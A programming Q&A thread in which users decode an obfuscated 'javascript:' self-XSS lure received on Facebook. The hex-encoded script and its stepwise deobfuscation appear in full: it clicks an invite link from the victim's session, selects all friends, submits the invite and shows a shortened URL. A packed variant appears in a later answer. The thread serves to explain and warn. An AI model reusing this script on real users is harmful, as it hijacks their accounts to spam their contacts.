
I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

Here's the source code:

// (DO NOT DO THIS!)
// Self-XSS lure. The "Javascript:" prefix makes a browser that accepts it in
// the address bar run the rest as script inside whatever page is open, i.e.
// with the reader's own logged-in session on that site. Most current browsers
// strip the scheme when text is pasted into the address bar.
//
// Every string the script needs is stored hex-escaped (\xNN) in the table `a`
// and reached through bracket access such as document[a[2]](...), so no
// readable property name, URL or markup appears in the text. Decoding the
// escapes is enough to read it; nothing has to be executed.
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
// Overwrite the innerHTML (a[0]) of the element whose id is a[1] with the
// markup in a[3], then fetch the element with id a[4] that this markup defines.
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
// Build a synthetic event (class a[5], type a[7], bubbles and cancelable both
// true) and dispatch it on that element, as if the reader had clicked it.
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
// After 4 s: call fs[a[10]](). `fs` is not defined in this snippet, so it is
// presumably a global supplied by the host page.
void (setTimeout(function (){fs[a[10]]();} ,4000));
// After 5 s: call SocialGraphManager[a[13]](a[11],a[12]); SocialGraphManager is
// likewise not defined here.
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
// After 5.4 s: replace the same element's content with a second hex-escaped
// string of markup (an anchor pointing at a shortened URL).
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));
SethO
asked Apr 14, 2010 at 0:37
  • possible duplicate of Javascript compiled or not? Check inside.... Commented May 13, 2010 at 13:33
  • @meager - how is it a duplicate? Even if the code snippet is the same (which it is not exactly), the question around the code is totally different. Commented May 13, 2010 at 13:40

3 Answers 3


Here is the formatted source:

// Deobfuscation stage 1: the hex escapes are decoded, the string table and the
// a[n] indirection are still in place. The index comments give the position
// each entry is referenced by below.
var a = ["innerHTML", // a[0]
 "app4949752878_app4949752878_dd", // a[1]: id of an element already in the host page
 "getElementById", // a[2]
 // a[3]: markup for a "Suggest to Friends" link with id "suggest"
 "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
 "suggest", // a[4]
 "MouseEvents", // a[5]
 "createEvent", // a[6]
 "click", // a[7]
 "initEvent", // a[8]
 "dispatchEvent", // a[9]
 "select_all", // a[10]
 "sgm_invite_form", // a[11]
 "/ajax/social_graph/invite_dialog.php", // a[12]
 "submitDialog"]; // a[13]
// document.getElementById(a[1]).innerHTML = a[3]: plant the link in the page.
void (document[a[2]](a[1])[a[0]] = a[3]);
// Fetch the planted link and fire a synthetic click on it.
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
// Timed follow-up steps; `fs` and `SocialGraphManager` are not defined in this
// script and are presumably globals of the host page.
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
// Last step swaps the planted link for one pointing at a shortened URL.
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

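The a array holds all strings used by the code; each \xNN escape in the original is just the hexadecimal character code of one ordinary character, so the strings can be read by decoding them without running anything.
Here it is with the strings put back in place: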

// Deobfuscation stage 2: the table lookups are replaced by the strings they
// stood for, so the script reads as ordinary DOM calls.
// Step 1: overwrite an existing page element with a "Suggest to Friends" link
// whose ajaxify attribute names the invite dialog endpoint.
void (document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
// Step 2: click that link from script, so no action by the reader is needed.
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true); // type "click", bubbles, cancelable
void ss.dispatchEvent(c);
// Step 3 (4 s later): call select_all() on the page global `fs`, presumably
// the friend selector of the dialog opened in step 2 (not visible in this script).
void setTimeout(function () {fs.select_all();}, 4000);
// Step 4 (5 s later): submit the form "sgm_invite_form" through the page's own
// SocialGraphManager, so the request is sent from the reader's session.
void setTimeout(function () {
 SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
// Step 5 (5.4 s later): replace the planted link with a "Completed!" link to a
// shortened URL.
void setTimeout(function () {
 document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

Finally, here it is with decent names and structure:

// Deobfuscation stage 3: same statements with descriptive names. Read as a
// whole, the script drives the host page's own "Suggest to Friends" flow from
// the reader's session: plant the link, click it, select everything in the
// dialog, submit, then show a link to a shortened URL.

// Element of the host page that the script uses as its output area.
var messageElement = document.getElementById('app4949752878_app4949752878_dd');
// Plant the invite link; node_id is presumably the page being promoted.
messageElement.innerHTML = 
 "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";
// Fire a synthetic click on the planted link (bubbles and cancelable both true).
var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);
// The fixed delays presumably leave time for the dialog to load; `fs` and
// `SocialGraphManager` are host-page globals, not defined in this script.
setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
 SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
// Finally replace the planted link with the "Completed!" link.
setTimeout(function () {
 messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
answered Apr 14, 2010 at 0:40

9 Comments

Please wait while I translate it.
It looks like a cheap way of selecting all of your friends and inviting them to use the app.
@yar: Firebug. alert(function() { any source });
The interesting thing is how many people actually fell for it - 13K! And it includes people from UK, US and Australia. See the report over here - bit.ly/info/bTl0vj
@SLaks: The Firebug trick is nice. Didn't know that alerting a function actually parses it and prints it in a pretty way. Thanks!

I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.

My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking; at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity is used and abused, or your bank accounts are drained.

answered Apr 14, 2010 at 1:49


Very interesting. How did you go about decoding it though?

I got something like this just now, but it didn't look like the same type of content. Part of the code (the latter half) is below. I didn't know if I should paste the entire code. Newbie here.

 (new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
answered May 10, 2010 at 4:21
